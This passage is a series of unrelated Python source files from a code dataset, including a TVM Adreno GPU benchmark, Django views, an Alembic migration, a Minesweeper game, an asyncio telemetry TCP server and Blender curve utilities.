testing.resnet.get_workload(\n            num_layers=n_layer, batch_size=batch_size, dtype=dtype\n        )\n    elif \"vgg\" in name:\n        n_layer = int(name.split(\"-\")[1])\n        net, params = testing.vgg.get_workload(\n            num_layers=n_layer, batch_size=batch_size, dtype=dtype\n        )\n    elif \"densenet\" in name:\n        n_layer = int(name.split(\"-\")[1])\n        net, params = testing.densenet.get_workload(\n            densenet_size=n_layer, batch_size=batch_size, dtype=dtype\n        )\n    elif \"squeezenet\" in name:\n        version = name.split(\"_v\")[1]\n        net, params = testing.squeezenet.get_workload(\n            batch_size=batch_size, version=version, dtype=dtype\n        )\n    elif name == \"mxnet\":\n        # an example for mxnet model\n        from mxnet.gluon.model_zoo.vision import get_model\n\n        block = get_model(\"resnet18_v1\", pretrained=True)\n        net, params = relay.frontend.from_mxnet(block, shape={\"data\": input_shape}, dtype=dtype)\n        net = net[\"main\"]\n        net = relay.Function(\n            net.params, relay.nn.softmax(net.body), None, net.type_params, net.attrs\n        )\n        net = tvm.IRModule.from_expr(net)\n    else:\n        raise ValueError(\"Unsupported network: \" + name)\n\n    return net, params, input_shape, output_shape\n\n\ndef print_progress(msg):\n    \"\"\"print progress message\n\n    Parameters\n    ----------\n    msg: str\n        The message to print\n    \"\"\"\n    sys.stdout.write(msg + \"\\\r\")\n    sys.stdout.flush()\n\n\ndef tune_tasks(\n    tasks,\n    measure_option,\n    tuner=\"xgb\",\n    n_trial=1024,\n    early_stopping=None,\n    log_filename=\"tuning.log\",\n):\n    # the \"ga\", \"random\" and \"gridsearch\" branches below need their tuners imported too\n    from tvm.autotvm.tuner import XGBTuner, GATuner, RandomTuner, GridSearchTuner\n\n    tmp_log_file = log_filename + \".tmp\"\n\n    for i, tsk in enumerate(reversed(tasks)):\n        print(\"Task: \", tsk)\n        prefix = \"[Task %2d/%2d] \" % (i + 1, len(tasks))\n\n        # create tuner\n        if tuner == \"xgb\":\n            tuner_obj = XGBTuner(tsk, loss_type=\"reg\")\n        elif tuner == \"xgb_knob\":\n            tuner_obj = XGBTuner(tsk, loss_type=\"reg\", feature_type=\"knob\")\n        elif tuner == \"xgb_itervar\":\n            tuner_obj = XGBTuner(tsk, loss_type=\"reg\", feature_type=\"itervar\")\n        elif tuner == \"xgb_curve\":\n            tuner_obj = XGBTuner(tsk, loss_type=\"reg\", feature_type=\"curve\")\n        elif tuner == 
\"xgb_rank\":\n tuner_obj = XGBTuner(tsk, loss_type=\"rank\")\n elif tuner == \"xgb_rank_knob\":\n tuner_obj = XGBTuner(tsk, loss_type=\"rank\", feature_type=\"knob\")\n elif tuner == \"xgb_rank_itervar\":\n tuner_obj = XGBTuner(tsk, loss_type=\"rank\", feature_type=\"itervar\")\n elif tuner == \"xgb_rank_curve\":\n tuner_obj = XGBTuner(tsk, loss_type=\"rank\", feature_type=\"curve\")\n elif tuner == \"xgb_rank_binary\":\n tuner_obj = XGBTuner(tsk, loss_type=\"rank-binary\")\n elif tuner == \"xgb_rank_binary_knob\":\n tuner_obj = XGBTuner(tsk, loss_type=\"rank-binary\", feature_type=\"knob\")\n elif tuner == \"xgb_rank_binary_itervar\":\n tuner_obj = XGBTuner(tsk, loss_type=\"rank-binary\", feature_type=\"itervar\")\n elif tuner == \"xgb_rank_binary_curve\":\n tuner_obj = XGBTuner(tsk, loss_type=\"rank-binary\", feature_type=\"curve\")\n elif tuner == \"ga\":\n tuner_obj = GATuner(tsk, pop_size=50)\n elif tuner == \"random\":\n tuner_obj = RandomTuner(tsk)\n elif tuner == \"gridsearch\":\n tuner_obj = GridSearchTuner(tsk)\n else:\n raise ValueError(\"Invalid tuner: \" + tuner)\n\n tsk_trial = min(n_trial, len(tsk.config_space))\n tuner_obj.tune(\n n_trial=tsk_trial,\n early_stopping=early_stopping,\n measure_option=measure_option,\n callbacks=[\n autotvm.callback.progress_bar(tsk_trial, prefix=prefix),\n autotvm.callback.log_to_file(tmp_log_file),\n ],\n )\n\n autotvm.record.pick_best(tmp_log_file, log_filename)\n\n\ndef evaluate_network(network, target, target_host, dtype, repeat):\n print_progress(network)\n net, params, input_shape, output_shape = get_network(network, batch_size=1, dtype=dtype)\n\n # Auto Tuning\n tune_log = \"adreno-\" + network + \"-\" + dtype + \".log\"\n tuning_options = {\n \"log_filename\": tune_log,\n \"early_stopping\": None,\n \"measure_option\": autotvm.measure_option(\n builder=autotvm.LocalBuilder(build_func=ndk.create_shared, timeout=15),\n runner=autotvm.RPCRunner(\n args.rpc_key,\n host=args.host,\n port=args.port,\n number=3,\n timeout=600,\n ),\n ),\n }\n if args.tune:\n tasks = autotvm.task.extract_from_program(\n net, target=target, target_host=target_host, params=params\n )\n tune_tasks(tasks, **tuning_options)\n\n print_progress(\"%-20s building...\" % network)\n\n # Build the tuning log\n if os.path.exists(tune_log):\n with autotvm.apply_history_best(tune_log):\n with tvm.transform.PassContext(opt_level=3):\n lib = relay.build(\n net, target=tvm.target.Target(target, host=target_host), params=params\n )\n else:\n with tvm.transform.PassContext(opt_level=3):\n lib = relay.build(\n net, target=tvm.target.Target(target, host=target_host), params=params\n )\n\n tmp = tempdir()\n\n filename = \"%s.so\" % network\n lib.export_library(tmp.relpath(filename), fcompile=ndk.create_shared)\n\n # upload library and params\n print_progress(\"%-20s uploading...\" % network)\n\n # connect to remote device\n tracker = tvm.rpc.connect_tracker(args.host, args.port)\n remote = tracker.request(args.rpc_key)\n\n dev = remote.device(str(target), 0)\n remote.upload(tmp.relpath(filename))\n\n rlib = remote.load_module(filename)\n module = runtime.GraphModule(rlib[\"default\"](dev))\n data_tvm = tvm.nd.array((np.random.uniform(size=input_shape)).astype(dtype))\n module.set_input(\"data\", data_tvm)\n\n # evaluate\n print_progress(\"%-20s evaluating...\" % network)\n ftimer = module.module.time_evaluator(\"run\", dev, number=1, repeat=repeat)\n prof_res = np.array(ftimer().results) * 1000 # multiply 1000 for converting to millisecond\n print(\n \"%-20s %-19s (%s)\"\n % 
(network + \"-\" + dtype, \"%.2f ms\" % np.mean(prof_res), \"%.2f ms\" % np.std(prof_res))\n )\n return (np.mean(prof_res), np.std(prof_res))\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\n \"--network\",\n type=str,\n choices=[\n \"resnet-18\",\n \"resnet-34\",\n \"resnet-50\",\n \"vgg-16\",\n \"vgg-19\",\n \"densenet-121\",\n \"inception_v3\",\n \"mobilenet\",\n \"squeezenet_v1.0\",\n \"squeezenet_v1.1\",\n ],\n help=\"The name of neural network\",\n )\n parser.add_argument(\"--host\", type=str, default=\"127.0.0.1\")\n parser.add_argument(\"--port\", type=int, default=9190)\n parser.add_argument(\"--rpc-key\", type=str, default=\"android\")\n parser.add_argument(\"--repeat\", type=int, default=30)\n parser.add_argument(\"--tune\", type=bool, default=False)\n args = parser.parse_args()\n\n if args.network is None:\n networks = [\n \"resnet-18\",\n \"resnet-34\",\n \"resnet-50\",\n \"vgg-16\",\n \"vgg-19\",\n \"densenet-121\",\n \"inception_v3\",\n \"mobilenet\",\n \"squeezenet_v1.0\",\n \"squeezenet_v1.1\",\n ]\n else:\n networks = [args.network]\n\n target = \"opencl -device=adreno\"\n target_host = \"llvm -mtriple=arm64-linux-android\"\n\n print(\"--------------------------------------------------\")\n print(\"%-20s %-20s\" % (\"Network Name\", \"Mean Inference Time (std dev)\"))\n print(\"--------------------------------------------------\")\n\n results = {}\n\n for network in networks:\n ftime = evaluate_network(network, target, target_host, \"float32\", args.repeat)\n results[network + \"-float32\"] = ftime\n ftime = evaluate_network(network, target, target_host, \"float16\", args.repeat)\n results[network + \"-float16\"] = ftime\n\n print(\"----------------------------------------------------------------------\")\n print(\"%-30s %-30s\" % (\"Network Name\", \"Mean Inference Time (std dev)\"))\n print(\"----------------------------------------------------------------------\")\n for key, val in results.items():\n print(\"%-30s %-30s (%s)\" % (key, \"%.2f ms\" % val[0], \"%.2f ms\" % val[1]))\n","sub_path":"apps/benchmark/adreno/adreno_gpu_bench_texture.py","file_name":"adreno_gpu_bench_texture.py","file_ext":"py","file_size_in_byte":10893,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"434724088","text":"from django.shortcuts import render\nfrom .models import Service\nfrom images.models import Image\n\n\ndef service_list_view(request, *args, **kwargs):\n my_content = {}\n image = []\n content = Service.objects.all()\n for c in content:\n image.append(Image.objects.filter(content__slug=c))\n my_content[c] = [c, image]\n context = {\n \"content\": my_content,\n }\n return render(request, 'service/list_view.html', context)\n\n\ndef service_detail_view(request, service=None, *args, **kwargs):\n obj = Service.objects.get(slug=service)\n context = {'obj': obj}\n return render(request, 'service/detail_view.html', context)","sub_path":"rahatapply_v0.0.3/src/services/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":651,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"535709838","text":"\"\"\"events class\n\nRevision ID: e62e59678494\nRevises: 3ef49dbc89f6\nCreate Date: 2018-11-18 13:28:53.049020\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'e62e59678494'\ndown_revision = '3ef49dbc89f6'\nbranch_labels = None\ndepends_on = None\n\n\ndef 
upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('post', sa.Column('date', sa.DateTime(), nullable=True))\n op.add_column('post', sa.Column('time', sa.DateTime(), nullable=True))\n op.add_column('post', sa.Column('title', sa.String(length=25), nullable=True))\n op.add_column('post', sa.Column('venue', sa.String(length=70), nullable=True))\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('post', 'venue')\n op.drop_column('post', 'title')\n op.drop_column('post', 'time')\n op.drop_column('post', 'date')\n # ### end Alembic commands ###\n","sub_path":"migrations/versions/e62e59678494_events_class.py","file_name":"e62e59678494_events_class.py","file_ext":"py","file_size_in_byte":992,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"560151452","text":"from django.test.simple import DjangoTestSuiteRunner\n\nimport unittest\nfrom unittest import TextTestResult\n\nfrom djangae.db.backends.appengine.dbapi import NotSupportedError, CouldBeSupportedError\n\nclass SkipUnsupportedTestResult(TextTestResult):\n\n def addError(self, test, err):\n if err[0] in (NotSupportedError, CouldBeSupportedError):\n self.addExpectedFailure(test, err)\n else:\n super(SkipUnsupportedTestResult, self).addError(test, err)\n\nclass DjangaeTestSuiteRunner(DjangoTestSuiteRunner):\n def run_suite(self, suite, **kwargs):\n return unittest.TextTestRunner(\n verbosity=self.verbosity,\n failfast=self.failfast,\n resultclass=SkipUnsupportedTestResult\n ).run(suite)\n","sub_path":"djangae/test_runner.py","file_name":"test_runner.py","file_ext":"py","file_size_in_byte":760,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"433346392","text":"import IN104_simulateur as simu\nfrom evaluation import evaluate\nfrom minimax_time import minimax_alphabeta\nfrom time import time\nsimu.GameState.get_children = simu.GameState.findNextStates\nsimu.GameState.evaluate = evaluate\n\nclass MinimaxBrain:\n\n\tdef __init__(self, config=None, rules=None):\n\t\tself.name = \"AII\" # set your AI name here\n\t\tself.depth = 5 # Set the exploration depth here\n\t\tself.time_list = []\n\t\t\n\n\tdef play(self, gameState, timeLimit):\n\t\t#use minimax here to return the next state with higher score\n\t\tT=timeLimit\n\t\tt1=time()\n\t\tstates=gameState.findNextStates()\n\t\tN=len(states)\n\t\tgoodState=states[0]\n\t\tm=-10**10\n\t\tt2=time()\n\t\tT=T-(t2-t1)\n\t\tfor state in states:\n\t\t\tt3=time()\n\t\t\ts=minimax_alphabeta(state,T/N,True)\n\t\t\tN=N-1\n\t\t\tt4=time()\n\t\t\tT=T-(t4-t3)\n\t\t\tif m= 500000:\n bid = 1000\n else:\n raise ValueError\n quo = price // bid\n remain = price % bid\n if remain == 0:\n return quo * bid\n else:\n if close2up:\n return quo * bid + bid\n else:\n return quo * bid\n\n\ndef weight_to_value(port_value, weight):\n value = port_value * weight / 100\n return value\n\n\ndef value_to_shares(value, price):\n return value // price\n\n\ndef weight_to_shares(weight, port_value, price):\n value = weight_to_value(port_value, weight)\n shares = value_to_shares(value, price)\n return shares","sub_path":"utils/stuff.py","file_name":"stuff.py","file_ext":"py","file_size_in_byte":1756,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"546693008","text":"from unittest import mock\n\nimport pytest\n\nfrom tech_gallery_bot.domain.user import 
User\nfrom tech_gallery_bot.repositories import UserRepository\nfrom tests.repository.helpers import DotDict\n\nVALID_USER_DICT = DotDict(\n    {\n        \"id\": \"123456789123456789\",\n        \"email\": \"jane@ciandt.com\",\n        \"followedTechnologyIds\": [\"python\", \"ruby\", \"kotlin\", \"rust\"],\n        \"name\": \"Jane Doe\",\n        \"photo\": \"https://server.com/image.png\",\n        \"postGooglePlusPreference\": False,\n        \"project\": None,\n        \"timezoneOffset\": -180,\n    }\n)\n\nVALID_USER_DOMAIN = User(\n    id_=\"123456789123456789\",\n    name=\"Jane Doe\",\n    email=\"jane@ciandt.com\",\n    photo=\"https://server.com/image.png\",\n)\n\n\n@pytest.mark.parametrize(\"client\", [None, \"\"])\ndef test_user_repository_invalid_init(client):\n    with pytest.raises(TypeError):\n        UserRepository(client)\n\n\ndef test_user_repository_find_by_email():\n    with mock.patch(\"google.cloud.datastore.Client\", autospec=True) as client:\n        with mock.patch(\"google.cloud.datastore.query.Query\", autospec=True) as query:\n            client.query.return_value = query\n            query.fetch.return_value = [VALID_USER_DICT]\n\n            user = UserRepository(client).find_by_email(\"jane@ciandt.com\")\n\n            client.query.assert_called_once_with(kind=\"TechGalleryUser\")\n            query.add_filter.assert_called_once_with(\"email\", \"=\", \"jane@ciandt.com\")\n            query.fetch.assert_called_once_with(limit=1)\n\n            assert user == VALID_USER_DOMAIN\n\n\ndef test_user_repository_find_by_email_without_results():\n    with mock.patch(\"google.cloud.datastore.Client\", autospec=True) as client:\n        with mock.patch(\"google.cloud.datastore.query.Query\", autospec=True) as query:\n            client.query.return_value = query\n            query.fetch.return_value = []\n\n            user = UserRepository(client).find_by_email(\"jane@ciandt.com\")\n            assert user is None\n","sub_path":"tests/repository/test_user_repository.py","file_name":"test_user_repository.py","file_ext":"py","file_size_in_byte":1939,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"}
{"seq_id":"80596030","text":"import random\nclass MineSweeperTile:\n    covered = True\n    marked = False\n    isMine = False\n    mineNeighbor = 0\n\n    def printObjAsDictKey(self):\n        if self.marked:\n            return 'Marked'\n        elif self.covered:\n            return 'Covered'\n        elif not self.isMine:\n            return str(self.mineNeighbor)\n        else:\n            return 'Mine'\n\n    def printObj(self):\n        if self.covered:\n            printStr = 'Covered;'\n        else:\n            printStr = 'UnCovered;'\n        if self.marked:\n            printStr += 'Marked;'\n        else:\n            printStr += 'UnMarked;'\n        if self.isMine:\n            printStr += 'Mine'\n        else:\n            printStr += str(self.mineNeighbor)\n        return printStr\n\n    def __str__(self):\n        return self.printObj()\n\nclass MineSweeperGrid:\n    rows = 3\n    cols = 2\n    numMines = 10\n    fail = False\n    firstClick = True\n\n    def __init__(self, rows=9, cols=9, mines=10):\n        self.rows = rows\n        self.cols = cols\n        self.numMines = mines\n        self.mineUnMarked = mines\n        # build fresh per-instance grids; class-level lists would be shared\n        # between instances and grow again on every new game\n        self.grid = []\n        self.backupGrid = []\n        for i in range(self.rows):\n            self.grid.append([])\n            self.backupGrid.append([])\n            for j in range(self.cols):\n                self.grid[i].append(MineSweeperTile())\n                self.backupGrid[i].append(MineSweeperTile())\n\n    def revert(self):\n        a = self.grid\n        self.grid = self.backupGrid\n        self.backupGrid = a\n\n    def makeBackup(self):\n        if not self.fail:\n            for i in range(self.rows):\n                for j in range(self.cols):\n                    self.backupGrid[i][j].covered = self.grid[i][j].covered\n                    self.backupGrid[i][j].marked = self.grid[i][j].marked\n                    self.backupGrid[i][j].isMine = self.grid[i][j].isMine\n                    self.backupGrid[i][j].mineNeighbor = self.grid[i][j].mineNeighbor\n\n\n    def 
cellNeighbors(self, x, y):\n neighbors = []\n for i in (x - 1, x, x + 1):\n for j in (y - 1, y, y + 1):\n if not (i == x and j == y) and i >= 0 and i < self.rows and j >= 0 and j < self.cols:\n neighbors.append((i, j))\n return neighbors\n\n #init the grid with mines after the first click, the first click point can not be a mine\n def initGrid(self, x, y):\n minePlanted = 0\n while minePlanted < self.numMines:\n rX = random.randint(0, self.rows - 1)\n rY = random.randint(0, self.cols - 1)\n if not (rX == x and rY == y) and self.grid[rX][rY].isMine == False:\n self.grid[rX][rY].isMine = True\n minePlanted += 1\n for i in range(self.rows):\n for j in range(self.cols):\n mines = 0\n for (r,c) in self.cellNeighbors(i, j):\n if self.grid[r][c].isMine:\n mines += 1\n self.grid[i][j].mineNeighbor = mines\n\n def openNoMineTile(self, x, y):\n if self.grid[x][y].covered == False:\n return\n self.grid[x][y].covered = False\n if self.grid[x][y].mineNeighbor == 0:\n for (r,c) in self.cellNeighbors(x, y):\n self.openNoMineTile(r, c)\n\n def openAllMineTiles(self):\n for i in range(self.rows):\n for j in range(self.cols):\n if self.grid[i][j].isMine:\n self.grid[i][j].covered = False\n self.grid[i][j].marked = False\n\n def openTile(self, x, y):\n if self.grid[x][y].marked:\n return\n if self.grid[x][y].isMine:\n self.fail = True\n self.openAllMineTiles() # game over, lost, reveal all mines\n return\n else:\n self.openNoMineTile(x, y)\n\n def openFirstTile(self, x, y):\n self.firstClick = False\n self.initGrid(x, y)\n self.openTile(x, y)\n\n def openMultiTile(self,x,y):\n if self.grid[x][y].covered or self.grid[x][y].marked:\n return\n neighbors = self.cellNeighbors(x,y)\n mark = 0\n for (r,c) in neighbors:\n if self.grid[r][c].marked:\n mark += 1\n if mark == self.grid[x][y].mineNeighbor:\n for (r,c) in neighbors:\n if not self.grid[r][c].marked and self.grid[r][c].covered:\n self.openTile(r, c)\n\n def success(self):\n if self.firstClick:\n return False #hav't even started\n for i in range(self.rows):\n for j in range(self.cols):\n if self.grid[i][j].marked != self.grid[i][j].isMine:\n return False\n if self.grid[i][j].covered and not self.grid[i][j].isMine:\n return False\n print('Success')\n return True\n\n def gridIndexToCoord(self, row, col, width, height, margin):\n return (col*(width+margin)+margin, row*(height+margin)+margin)\n\n def coordToGridIndex(self, x, y, width, height, margin):\n return((int) ((y-margin)/(margin + height )),(int) ((x-margin)/(margin + width)) )\n","sub_path":"MineSweeperClass.py","file_name":"MineSweeperClass.py","file_ext":"py","file_size_in_byte":5117,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"150268033","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.5 (62131)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.macosx-10.3-i386/egg/aha/controller/tests/test_controller.py\n# Compiled at: 2010-10-20 22:45:56\nfrom unittest import TestCase\nimport logging\nlog = logging.getLogger(__name__)\nfrom nose.tools import *\nfrom coregae.controller.formcontrol import FormControl, handle_state, validate\nFC = FormControl\n\nclass TestCRUDControllerMixIn(TestCase):\n\n def test_subclass(self):\n \"\"\"\n Test for subclassing CRUDControllerMixIn\n \"\"\"\n from coregae.controller.crudcontrollers import CRUDControllerMixIn, CRUDControllerMetaClass\n\n class TestKlass(CRUDControllerMixIn):\n EDIT_FC = FormControl()\n ADD_FC = FormControl()\n\n 
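# overridden states (SUCCESS here) should end up subclass-local, while untouched\n            # states remain shared with the parent; the asserts below verify this\n            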
@EDIT_FC.handle_state(FC.SUCCESS)\n            def edit_data(self):\n                return 'FOO'\n\n            @EDIT_FC.handle_validate(FC.INITIAL)\n            def edit_validate(self):\n                pass\n\n            @ADD_FC.handle_state(FC.INITIAL)\n            def add_form(self):\n                return 'FOO'\n\n        assert_true(hasattr(TestKlass, 'EDIT_FC'))\n        assert_true(hasattr(TestKlass, 'ADD_FC'))\n        assert_not_equal(TestKlass.EDIT_FC, CRUDControllerMixIn.EDIT_FC)\n        efc = TestKlass.EDIT_FC\n        efc2 = CRUDControllerMixIn.EDIT_FC\n        assert_equal(efc.get_processor(FC.INITIAL), efc2.get_processor(FC.INITIAL))\n        assert_not_equal(efc.get_processor(FC.SUCCESS), efc2.get_processor(FC.SUCCESS))\n        assert_not_equal(efc.get_validator(FC.INITIAL), efc2.get_validator(FC.INITIAL))\n        afc = TestKlass.ADD_FC\n        afc2 = CRUDControllerMixIn.ADD_FC\n        assert_not_equal(afc.get_processor(FC.INITIAL), afc2.get_processor(FC.INITIAL))","sub_path":"pycfiles/aha-0.85adev-py2.5/test_controller.py","file_name":"test_controller.py","file_ext":"py","file_size_in_byte":1824,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"}
{"seq_id":"7711992","text":"import asyncio\nimport datetime\nimport re\n\nmess = '$CZ^LBV5S3106ESJ03738^12980102012051|30:14.2^31:0859^32:000^33:014^34:010^35:090^36:01.24^37:09.07^38:0003.49^39:0028477^3A:00.62^3B:005^3C:000^3D:000^3E:000^3F:000|V:127'\nclass EchoServer(asyncio.Protocol):\n    def connection_made(self, transport):\n        peername = transport.get_extra_info('peername')\n        print('Client {} connected.'.format(peername))\n        self.transport = transport\n\n    def data_received(self, data):\n        data1 = re.split(r'[\\^\\:\\s]\\s*',data.decode('utf-8'))\n        if '31' in data1 and '32' in data1 and '33' in data1 and '39' in data1:\n            print('Total mileage: {}Km'.format(data1[21]))\n        elif '61' in data1 and '62' in data1:\n            print('GPS coordinates: {},{}'.format(data1[5],data1[3]))\n        else:\n            pass\n        # print('{} received data: {}'.format(datetime.datetime.now(),data.decode('utf-8')))\n        data2 = re.split(r'[\\^\\:\\|\\s]\\s*',data.decode('utf-8'))\n        # print(data2)\n        if '10' in data2 and '05' in data2:\n            if '02' == data2[4]:\n                print('Vehicle engine off')\n            if '01' == data2[4]:\n                print('Vehicle started')\n        if '20' in data2 and '21' in data2 and '22' in data2:\n            if float(data2[6]) < 11:\n                print('Power-loss alarm')\n        if '30' in data2 and '31' in data2 and '32' in data2:\n            if float(data2[4]) < 11:\n                print('Power-loss alarm')\n\n        self.transport.write(data)\n\n        if data == b'exit':\n            self.transport.close()\n            print('Transport closed')\n\n    def connection_lost(self,*args):\n        print('Client disconnected.')\n\n\nloop = asyncio.get_event_loop()\ncoro = loop.create_server(EchoServer, '0.0.0.0', 8221)\nserver = loop.run_until_complete(coro)\n\nprint('serving on {}'.format(server.sockets[0].getsockname()))\n\ntry:\n    loop.run_forever()\nexcept KeyboardInterrupt:\n    print(\"exit\")\nfinally:\n    server.close()\n    loop.close()","sub_path":"tcp_server.py","file_name":"tcp_server.py","file_ext":"py","file_size_in_byte":1993,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"}
{"seq_id":"284167029","text":"import random\n\ndef main():\n    # set file names and initialize sequences\n    input_file = \"sherlock.txt\"\n    output_file = input_file[:-4]+\"_out.txt\"\n    words = []\n    trigrams = {}\n    story_string = \"\"\n\n    # open input file and read words into words list\n    with open(input_file, 'r') as f:\n        for line in f:\n            for word in line.strip().split():\n                words.append(word)\n\n    # process trigrams and save to trigrams dict\n    # key = words[i] + ' ' + words[i+1]\n    # value = list of existing words[i+2] for a given key\n    for i in range(len(words)-2):\n        tri = words[i]+' 
'+words[i+1]\n if tri not in trigrams.keys():\n trigrams[tri] = []\n trigrams[tri].append(words[i+2])\n\n # start story as random choice of a trigram from trigrams dict\n story = random.choice(list(trigrams.keys())).split()\n i = 0\n\n # create story based on trigram processing\n # key = story[i] + ' ' + story[i+1]\n # value = random choice from list of possible values => story[i+2]\n while True:\n key = story[i]+' '+story[i+1]\n if key in trigrams.keys():\n story.append(random.choice(trigrams[key]))\n i += 1\n else:\n break\n\n # convert story list to string\n for word in story:\n story_string += ' '+word\n story_string = story_string.lstrip()\n\n # save story to output file\n with open(output_file, 'w') as f:\n f.write(story_string)\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"students/cocokaku/lesson4/kata_fourteen.py","file_name":"kata_fourteen.py","file_ext":"py","file_size_in_byte":1493,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"511228978","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport json\n\nfrom alipay.aop.api.constant.ParamConstants import *\n\n\nclass AlipaySecurityProdFingerprintDeviceVerifyModel(object):\n\n def __init__(self):\n self._ifaa_version = None\n self._ifaf_message = None\n self._out_biz_no = None\n\n @property\n def ifaa_version(self):\n return self._ifaa_version\n\n @ifaa_version.setter\n def ifaa_version(self, value):\n self._ifaa_version = value\n @property\n def ifaf_message(self):\n return self._ifaf_message\n\n @ifaf_message.setter\n def ifaf_message(self, value):\n self._ifaf_message = value\n @property\n def out_biz_no(self):\n return self._out_biz_no\n\n @out_biz_no.setter\n def out_biz_no(self, value):\n self._out_biz_no = value\n\n\n def to_alipay_dict(self):\n params = dict()\n if self.ifaa_version:\n if hasattr(self.ifaa_version, 'to_alipay_dict'):\n params['ifaa_version'] = self.ifaa_version.to_alipay_dict()\n else:\n params['ifaa_version'] = self.ifaa_version\n if self.ifaf_message:\n if hasattr(self.ifaf_message, 'to_alipay_dict'):\n params['ifaf_message'] = self.ifaf_message.to_alipay_dict()\n else:\n params['ifaf_message'] = self.ifaf_message\n if self.out_biz_no:\n if hasattr(self.out_biz_no, 'to_alipay_dict'):\n params['out_biz_no'] = self.out_biz_no.to_alipay_dict()\n else:\n params['out_biz_no'] = self.out_biz_no\n return params\n\n @staticmethod\n def from_alipay_dict(d):\n if not d:\n return None\n o = AlipaySecurityProdFingerprintDeviceVerifyModel()\n if 'ifaa_version' in d:\n o.ifaa_version = d['ifaa_version']\n if 'ifaf_message' in d:\n o.ifaf_message = d['ifaf_message']\n if 'out_biz_no' in d:\n o.out_biz_no = d['out_biz_no']\n return o\n\n\n","sub_path":"alipay/aop/api/domain/AlipaySecurityProdFingerprintDeviceVerifyModel.py","file_name":"AlipaySecurityProdFingerprintDeviceVerifyModel.py","file_ext":"py","file_size_in_byte":2007,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"439177558","text":"\ndef calculate_pi(n_terms):\n\t\"\"\" calculating pi using Leibniz formula:\n\t\tpi = 4/1 - 4/3 + 4/5 - 4/7 + 4/9 - 4/11 ...\n\t\"\"\"\n\tnumerator = 4.0\n\tdenominator = 1.0\n\toperation = 1.0\n\tpi = 0.0\n\n\tfor _ in range(n_terms):\n\t\tpi += operation * (numerator / denominator)\n\t\tdenominator += 2.0\n\t\toperation *= - 1.0\n\treturn pi\n\nif __name__ == 
'__main__':\n\tprint(calculate_pi(1000000))","sub_path":"ClassicProblemsPy/calculating_pi.py","file_name":"calculating_pi.py","file_ext":"py","file_size_in_byte":368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"}
{"seq_id":"151935857","text":"from django.contrib import admin\n\n# Register your models here.\nfrom home.models import Settings, ContactFormMessage\n\n\nclass ContactFormMessageAdmin(admin.ModelAdmin):\n    list_display = ['name','email','subject','message','note','status']\n    list_filter = ['status']\n\nadmin.site.register(ContactFormMessage, ContactFormMessageAdmin)\nadmin.site.register(Settings)\n\n\n# stopped here\n\n\n\n","sub_path":"home/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":385,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"}
{"seq_id":"341673052","text":"import bpy\nimport hashlib\nimport math\nfrom array import array\n\n\ndef r(x, y, center=None):\n    center_x, center_y = center or (0, 0)\n    return math.sqrt(math.pow(center_x - x, 2) + math.pow(center_y - y, 2))\n\n\ndef theta(x, y, center=None):\n    center_x, center_y = center or (0, 0)\n    return math.atan2(center_y - y, center_x - x)\n\n\ndef polar_to_xy(r, theta):\n    return r * math.cos(theta), r * math.sin(theta)\n\n\nclass Lockable:\n    def lock(self):\n        self[\"lock\"] = True\n\n    def unlock(self):\n        del self[\"lock\"]\n\n\ndef if_unlocked(func):\n    def _if_unlocked(self, context):\n        if not self.get(\"lock\", False):\n            func(self, context)\n\n    return _if_unlocked\n\n\ndef hash_curve(hash_algo, curve: bpy.types.Curve):\n    spline: bpy.types.Spline\n    point: bpy.types.SplinePoint\n    bezier_point: bpy.types.BezierSplinePoint\n\n    hash_algo.update(array(\"l\", [curve.resolution_u, curve.resolution_v]))\n    hash_algo.update(bytes(curve.dimensions, \"ascii\"))\n    for spline in curve.splines:\n        hash_algo.update(bytes(spline.type, \"ascii\"))\n        hash_algo.update(bytes(spline.radius_interpolation, \"ascii\"))\n        hash_algo.update(bytes(spline.tilt_interpolation, \"ascii\"))\n        hash_algo.update(array(\"l\", [\n            spline.order_u, spline.order_v, spline.resolution_u,\n            spline.resolution_v, spline.use_bezier_u,\n            spline.use_bezier_v, spline.use_cyclic_u, spline.use_cyclic_v,\n            spline.use_endpoint_u, spline.use_endpoint_v, spline.use_smooth]))\n        for bezier_point in spline.bezier_points:\n            hash_algo.update(array(\"d\", bezier_point.co))\n            hash_algo.update(array(\"d\", bezier_point.handle_left))\n            hash_algo.update(array(\"d\", bezier_point.handle_right))\n            hash_algo.update(bytes(bezier_point.handle_right_type, \"ascii\"))\n            hash_algo.update(bytes(bezier_point.handle_left_type, \"ascii\"))\n        for point in spline.points:\n            hash_algo.update(array(\"d\", point.co))\n            hash_algo.update(array(\"d\", [point.tilt, point.weight]))\n\n\ndef copy_curve(to_curve: bpy.types.Curve, from_curve: 